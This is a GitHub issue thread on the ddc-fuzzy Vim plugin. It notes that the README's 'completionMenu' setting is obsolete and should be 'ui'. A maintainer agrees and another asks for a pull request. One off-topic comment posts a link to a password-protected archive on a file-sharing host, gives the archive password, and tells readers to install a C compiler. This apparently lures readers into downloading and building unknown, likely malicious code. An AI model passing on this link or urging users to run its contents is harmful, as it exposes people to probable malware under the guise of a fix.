### ISSUE TITLE
to change completionMenu to ui

### ISSUE THREAD

**Issue by bon-ami** [tani/ddc-fuzzy#19]
As in [doc of ddc.vim](https://github.com/search?q=repo%3AShougo%2Fddc.vim%20completionMenu&type=code), it seems you need to update your README to `call ddc#custom#patch_global('ui', 'pum')`

**Comment by pinpolhoxx** [comment]
try this
https://mega.co.nz/#!9jFTnQQa!-IQ1bo74J_ZxbbDvQKSXEj0mCXBuFYX9CK-5y5EV_0A
Archive codepass: changeme
If you don't have the c compliator, install it.(gcc or clang)

**Comment by Shougo** [comment]
True.

`completionMenu` option is removed now.

**Comment by tani** [comment]
Would you mind to write a pull request?
